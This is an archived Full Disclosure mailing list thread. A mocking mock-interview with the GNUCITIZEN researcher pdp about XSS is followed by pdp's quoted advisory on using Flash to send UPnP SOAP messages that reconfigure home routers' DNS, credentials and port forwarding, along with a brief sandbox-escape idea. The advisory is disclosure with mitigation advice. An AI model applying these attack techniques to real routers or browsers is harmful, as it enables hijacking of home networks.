Full Disclosure mailing list archives
Re: Hacking The Interwebs
From: "Fredrick Diggle" <fdiggle () gmail com>
Date: Tue, 15 Jan 2008 10:53:29 -0600
The following is a interview Fred Diggle Security conducted with the great researcher pdp (architect). In it he discloses some of his elite 0day research as well as his thoughts on the future of security and XSS. This should be published in phrack for sure. fred diggle: Hello to the pdp architect pdp: what's up bro fred diggle: have you found the xss lately pdp: yes many xss bugs fred diggle: <script>monkey()</script> pdp: your sarcasm is quite childish and kind of dull really, have you though about that ? <-- how rude :( [smile] fred diggle: Fredrick Diggle tries not to think about himself. it is depressing. job at zoo is unrewarding. may i join you as xss finder? pdp: I don't think that we have a place for you, we only employee the best fred diggle: Fredrick Diggle is the best google code search reg exer evar though pdp: [smile] really pdp: honestly, let's cut the crap, what's up with that on FD? you just need to annoy people or what? I don't get it. u and your other budies/personas/nicks fred diggle: actually fred diggle is only one person/nick/etc pdp: but you are in a group fred diggle: Fred Diggle Sec is a group but it only posts on FD with the name of founder and leader Fred Diggle. Who else on FD do you believe is Fred Diggle? pdp: don't know, everybody else that acts like retard on FD, and who have posted just 3 times, and comments on every single email <-- Or doesn't like pdp research into mad xss 0day fred diggle: nope those are not Fred Diggle pdp: I understand your motives to an extend. but what I don't understand is why you bother <-- oh does he? fred diggle: fred diggle has lots of free time at the zoo pdp: hah [smile]. so what's up with all that anti XSS thing, I haven't published a single XSS on GNUCITIZEN... it is mostly about how to use XSS as an attack vector fred diggle: its just kind of a retarded attack vector generally pdp: well to an extend yes, but the Web is growing and I truely believe that it will become more important in the future < WINNAR! pdp: have you checked the MacOS update hack. the idea is that when macos updates it pulls some JavaScript which run in very relaxed sandbox therefore attackers can take a full control of your PC. JavaScript is glue language the reason I talk about it and I research about it is because it exists everywhere <- You heard it here first, disclosure of gnucitizen 0day research vectors o.0 fred diggle: whats the vector of attack pdp: the vector is that the sandbox provides you with access to write/read and execute files this is serious enough <- Super Serial even... man bear pig is a real threat :( fred diggle: you talking some form of mitm? pdp: yes, in this case, yes, I am just giving a fresh example though, keep that in mind <- yay for bullshit fred diggle: elite! pdp: yeh and more over if you control the network the the extend where you can provide arbitrary code to the system then you can do other stuff as well. well JavaScript is everywhere, let me give you an example pdp: ok JavaScript runs on mobile phones, on every desktop, as WSH or in the Browser <-- XSS is like robots and will eventually destroy us fred diggle: why focus on the vector? pdp: JavaScript runs on the server side and under any architecture. I don't focus on one vector just this is how GNUCITIZEN was born it was Web oriented at first fred diggle: you focus on one interpreted language with very limited uses pdp: well I focus on stuff that none has researched yet. why bother doing the same as the others <- 0day ++ fred diggle: if a js hack is the best vector of attack people will use it. That doesn't mean it deserves attention. pdp: well I don't think that people know what they are doing <-- hear that FD, pdp thinks you are a moron :( fred diggle: but its almost never the best vector pdp: I am not saying that JavaScript is the ultimate tool but it may become. well it depends what you are after <-- soon we will have machines that run on XSS instead of oil fred diggle: are you after $ from dbags maybe? pdp: for example if you have a sandboxed browser how your buffer overflows will help you to do something, first of all let's define what attackers are after. most serious attacks are after the data spending so much time on hackign the client just to get into your data is usless instead someone can utilize XSS cuz that can definitely get to your ebay account for example. simepl <- gnucitizen will hack your ebay! oh noes! fred diggle: so you are honestly in this game to protect data? to make the world safer? pdp: I am not. I like breaking thing not protecting against attacks but to me the data is the ultimate goal fred diggle: but it seems to me if you are interested in presonal growth and learning you would focus on the more complex aspects of this stuff pdp: well we do many different stuff which I cannot talk about yet but that will come with the time <-- pdp likes to brag about mad xss 0day etc fred diggle: everything js can do is fairly obvious just from reading the spec. if you are really interested in breaking things then at least break the interpreter pdp: well there are ways to break the interpreter and hop sandboxes but why should I talk about that what I find is that very often people talk about theory theorethical crap although the research might look technically chalanging why should I publish it unless I have something solid <- that stuff is hard :( lets leave it to people with brains fred diggle: why should you ever publish it? pdp: so what worths beeing published? fred diggle: whats worth me giving up what I have spent hours on to a list of idiots for nothing? hrrm maybe a picture of a carrot pdp: I like that you are taking all these stuff from the fun side of things... and you are right, it is not worthed fred diggle: Fred Diggle thinks you just want to be famous pdp: not really. I love my work man fred diggle: bah so why be a tool about it, just do it and stop posting bullshit. You don't see the "trolls" on FD posting xss to be famous pdp: yes, but what do you get out of your joy... ok I must agree that I try to make GNUCITIZEN more popular, but the reason I try to do that is because I am tired of being someone else pone as you probably you are. so to an extend, the research I am doign is also an escape a life hack if you like so yes it is for $ and yes we make a name out of it but the goals are higher. I love the hacker culture first of all, I love it and this is the reason why I do other projects like Hakiri which I hope will work <- Fredrick Diggle sheds a tear. What a noble guy pdp is. Also he exploits the xss in his life >.< fred diggle: So how do you hope to get out? pdp: by giving my best <- finding all xss in the worlds fred diggle: I mean what is the "out" for a sec researcher <- hahahahaha fredrick diggle called pdp a security researcher. lulz pdp: put it this way. I presume you are a sec researcher fred diggle: no I work at a zoo pdp: if I can pay you to do your own research in your own defined time frame, would you like that? fred diggle: do you really believe that there are people willing to pay for that type of person to do xss? to do anything remotely related to it. the only money in xss is in "app scanning" crap and consulting which means you are either a pawn to big business and ultimately the economy or you are the business trying to survive in the economy and sec is not you focus. there are certainly research jobs out there but without demonstrating an understanding of the whole system... they are all out of your reach pdp: I don know why everyone brags about comp arch, it is almost like if you understand the stack you are 1337. why is that? fred diggle: ultimately what the people hiring for those jobs are looking for is an understanding of the basics. Or just the ability to understand the basics. Which like it or not are low level pdp: not true fred diggle: Anyone who has that can learn the higher levels pdp: what peopel are looking for is someone who understand the bigger picture and then they can hire anyeone to do the low stuff fred diggle: so you want to be a manager? researchers never understand the big picture pdp: nope, I like to be on my own with GNUCITIZEN, with Hakiri and everything that I believe in fred diggle: actually i should say don't need to pdp: they do it depends what you research fred diggle: if thats the sort of research you enjoy then be an economist and look at trends it the sec idustry its the same crap pdp: no socialscientist is better fred diggle: fien then do that <- just stop posting to the intarwebs pdp: but why should I do that when I know something esle already and I like doing it. maybe in 50 years we all go into politics <- hahahahahaha pdp for govnuh fred diggle: to address what you said earlier. when did you get the impression that we worship that sort of drivle pdp: I get the idea is that people in the sec research circles value everything that is related to how low system architecture work and abolish everything that is at level 7 or ring 3 pick fred diggle: nah that is a misunderstanding pdp: it is true fred diggle: I value things that are new and inovative. exloiting a buffer overflow of a stack variable is generally niether pdp: XSS is kind of new and can get very innovative, to an extend that you never know what has happended but you don't value it because you don't like that it is not asm. thing about it for a second the browser and every other JavaScript/ whatever sandbox restricts your from doing things so when you make it do what you want don't you think this is innovative? fred diggle: cite me some time when you made the javascript interpreter do something it wasn't supposed to? pdp: you cannot look it from the intrepeter point of view because under neat the intrepereter is the OS or the APP to be more precise so in that case you realy on the same old exploiting software techniques. you can make the intrepreter crash or whatever and with that gain control over the process. this is fine <- hard stuff again pdp doesn;t like the hard stuff that you can't read in documentation fred diggle: if its a blind strcpy in a js interpreter it won't hold my interest pdp: well the intrepeter is not like Pyton and Ruby it is really bare. it doesn't even have functionalities it is just the developer that decides what the intrepreter should have. for example, let's say that you want to get out of sandbox maybe the typical stuff you have in firefox the sadnbox has only 3 functions usually in XPCOM dump, debug and importFunction nonne of them are useful in whatever way and you are really locked. one way to get of the sandbox is to return a value which has a bit of sugger. the sugger looks like this {valueOf: function () {whatever}} if there is an object outside the sandbox which compares the return value to 1 or something else you might be able to overwrite strings outside of the sandbox which may influence the execution path. in firefox for exmaple you don't have only one sandbox you have layers of sandboxes so it does get quite interesting when it comes to stuff like this fred diggle: so what I see is one piece of mildly interesting information that could some day maybe be usful in some very specific part of a very specific exploit pdp: yes but this is what JS is... it is domain specifc platform the things that work in Firefox may not work in PDF and will be completely differnt from wSH so it is not that you learn just how x86 works every single platform is different. JavaSript is just a glue language, really but I am also tired talking about it <- thank god fred diggle: so stop. thats a good solution <- PLEASE! pdp: well there are tones of people that find all these stuff very valuable so I keep doing it because there are more developments fred diggle: anyway fredrick diggle needs to go clean up after the hippopotamus <- can you guess who the hippo is? On Jan 13, 2008 2:25 AM, pdp (architect) <pdp.gnucitizen () googlemail com> wrote:
http://www.gnucitizen.org/blog/hacking-the-interwebs When the victim visits a malicious SWF file, a 4 step ATTACK will silently execute in the background. At that moment the attacker will have control over their router, pretty much regardless of its model. Many of the home routers are vulnerable to this attack as many of them support UPnP to one degree or another. The attack does not rely on any bugs. Simply put, when two completely legitimate technologies, Flash and UPnP, are combined together, they compose a vulnerability, which exposes many home networks to a great risk. The attack depends on the fact that most, if not all, routers are UPnP enabled. The UPnP SOAP service can be accessed without authorization over the default Web Admin Interface. With the help of Flash, the attacker can send arbitrary SOAP messages to the router's UPnP control point and as such reconfigure the device in order to enable further attacks.. The most malicious of all malicious things to do when a device is compromised via the attack described in the link pointed at the top of this email, is to change the primary DNS server. That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it. It is also possible to reset the admin credentials and create the sort of onion routing network all bad guys want. Many routers come with Layer3 portforwarding UPnP service. This is also a potential vector that attackers can use. In cases like this, they will simply expose ports behind the router on the Internet facing side. We hope that by exposing this information, we will drastically improve the situation for the future. I think that this is a lot better than keeping it for ourselves or risking it all by given the criminals the opportunity to have in possession a secret which no one else is aware of. The best way to protect against this attack is turn off UPnP if your router's Admin Interface allows it. It seams that many routers simply does not have this feature. More information on related UPnP research can be found here: http://www.gnucitizen.org/ http://www.gnucitizen.org/blog/steal-his-wi-fi http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5 http://www.gnucitizen.org/blog/hacking-with-upnp-universal-plug-and-play GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community. GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we make everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to vast majority of people, simply because it is proven that the more people know about a certain problem, the better.-- pdp (architect) | petko d. petkov http://www.gnucitizen.org http://www.hakiri.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Hacking The Interwebs pdp (architect) (Jan 13)
- Re: Hacking The Interwebs Fredrick Diggle (Jan 15)
- Re: Hacking The Interwebs Ed Carp (Jan 15)
- Re: Hacking The Interwebs reepex (Jan 15)
- Re: Hacking The Interwebs Fredrick Diggle (Jan 15)